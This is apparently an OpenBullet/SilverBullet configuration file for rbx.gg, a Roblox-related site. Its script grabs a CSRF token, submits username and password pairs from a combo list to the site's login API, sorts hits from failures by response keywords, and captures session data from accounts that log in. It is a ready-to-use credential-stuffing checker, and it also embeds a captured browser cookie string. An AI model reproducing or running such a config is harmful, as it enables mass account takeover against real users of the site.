[SETTINGS]
{
  "Name": "rbx.gg",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2021-11-01T16:52:59.9120752+01:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "simple",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "rbx",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST GET "https://rbx.gg/api/user/session" 
  
  HEADER "Accept: */*" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Length: 163" 
  HEADER "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "Cookie: _ga=GA1.2.1930668690.1633796904; _gid=GA1.2.339118949.1633796904; _gat=1; RBXGGHWID=62b6b20df3a6616999e6e36637aaa79f86b6acc878482ba0fca9ed4c580004a9; __gads=ID=6597e5b92d56940e-22bef86fecca00d0:T=1633796907:RT=1633796907:S=ALNI_Mb3Pg9OX8kmC--PRiG_y5K4pFpLqQ; __viCookieActive=true; _pbjs_userid_consent_data=3524755945110770; crisp-client%2Fsession%2F1e83e80b-214e-4809-8a65-dd5013dde93c=session_c5db86c5-afe5-4b35-8a26-860b526674cb; __stripe_mid=3b5a999d-1890-4a90-a445-c2a90b636bf50d173e; __stripe_sid=f8393eb5-9369-40d4-8da3-b23efdc9a3600d0b15; _gat_gtag_UA_128776493_31=1; cto_bundle=K_9LG19YSzRXRTdGN3c4cjdtdFJBZWFIVnh4R1FrZFg4UnJJVnRKSWV0MldpU0RtbllGZFg4RTRMOEZ4QmM3TUtjUnV3UlNPcnNaOXlQbTBHdzlXSFMlMkZVTExaY3dWV3ZrSmYwc2hYbzBnJTJGTUROVmMlM0Q; cto_bidid=TdDiQV9mRXEzekZBUTdZMjhZa2Fla0VSbFd4OHdseWt1d2piNndpWXZxYjNuQlBqZnhtSnhSQVU3JTJCbmZaTW1tWDd1WTlqcVNIdTNqekNJNk9YNkFKdHZyOXN3JTNEJTNE; cto_bundle=psEvBl90Q1NXYzVOUmRNTTk3VHhScTdFbCUyQnRRNU1ZMWtQTU1LajBwZ0Y2dExmdno3S3JjR21yQlpHam1MckdlQmhqSDVaeTBYTE5vT2tkTnFrN2JJZ3pYU0tCQzJ6JTJGWG1TWkclMkJwcjBZY1ZzRWoxJTJGY2hHMFBmYTc2NFFZWHlFM0w0N0Nr" 
  HEADER "Host: rbx.gg" 
  HEADER "Origin: https://rbx.gg" 
  HEADER "Referer: https://rbx.gg/" 
  HEADER "sec-ch-ua: \"Chromium\";v=\"94\", \"Microsoft Edge\";v=\"94\", \";Not A Brand\";v=\"99\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36 Edg/94.0.992.38" 
  HEADER "X-Requested-With: XMLHttpRequest" 

PARSE "<SOURCE>" LR "{\"loggedin\":false,\"csrf\":\"" "\"}" -> VAR "token" 

REQUEST POST "https://rbx.gg/api/auth.php" 
  CONTENT "action=login&username=<USER>&password=<PASS>&email=&rememberme=false&captcha=&csrf=<token>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Length: 163" 
  HEADER "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "Cookie: _ga=GA1.2.1930668690.1633796904; _gid=GA1.2.339118949.1633796904; _gat=1; RBXGGHWID=62b6b20df3a6616999e6e36637aaa79f86b6acc878482ba0fca9ed4c580004a9; __gads=ID=6597e5b92d56940e-22bef86fecca00d0:T=1633796907:RT=1633796907:S=ALNI_Mb3Pg9OX8kmC--PRiG_y5K4pFpLqQ; __viCookieActive=true; _pbjs_userid_consent_data=3524755945110770; crisp-client%2Fsession%2F1e83e80b-214e-4809-8a65-dd5013dde93c=session_c5db86c5-afe5-4b35-8a26-860b526674cb; __stripe_mid=3b5a999d-1890-4a90-a445-c2a90b636bf50d173e; __stripe_sid=f8393eb5-9369-40d4-8da3-b23efdc9a3600d0b15; _gat_gtag_UA_128776493_31=1; cto_bundle=K_9LG19YSzRXRTdGN3c4cjdtdFJBZWFIVnh4R1FrZFg4UnJJVnRKSWV0MldpU0RtbllGZFg4RTRMOEZ4QmM3TUtjUnV3UlNPcnNaOXlQbTBHdzlXSFMlMkZVTExaY3dWV3ZrSmYwc2hYbzBnJTJGTUROVmMlM0Q; cto_bidid=TdDiQV9mRXEzekZBUTdZMjhZa2Fla0VSbFd4OHdseWt1d2piNndpWXZxYjNuQlBqZnhtSnhSQVU3JTJCbmZaTW1tWDd1WTlqcVNIdTNqekNJNk9YNkFKdHZyOXN3JTNEJTNE; cto_bundle=psEvBl90Q1NXYzVOUmRNTTk3VHhScTdFbCUyQnRRNU1ZMWtQTU1LajBwZ0Y2dExmdno3S3JjR21yQlpHam1MckdlQmhqSDVaeTBYTE5vT2tkTnFrN2JJZ3pYU0tCQzJ6JTJGWG1TWkclMkJwcjBZY1ZzRWoxJTJGY2hHMFBmYTc2NFFZWHlFM0w0N0Nr" 
  HEADER "Host: rbx.gg" 
  HEADER "Origin: https://rbx.gg" 
  HEADER "Referer: https://rbx.gg/" 
  HEADER "sec-ch-ua: \"Chromium\";v=\"94\", \"Microsoft Edge\";v=\"94\", \";Not A Brand\";v=\"99\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36 Edg/94.0.992.38" 
  HEADER "X-Requested-With: XMLHttpRequest" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "success" 
  KEYCHAIN Failure OR 
    KEY "Invalid Credentials." 
    KEY "A username is required." 
    KEY "A password is required." 

REQUEST GET "https://rbx.gg/api/user/session" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "{" "}" CreateEmpty=FALSE -> CAP "info" 

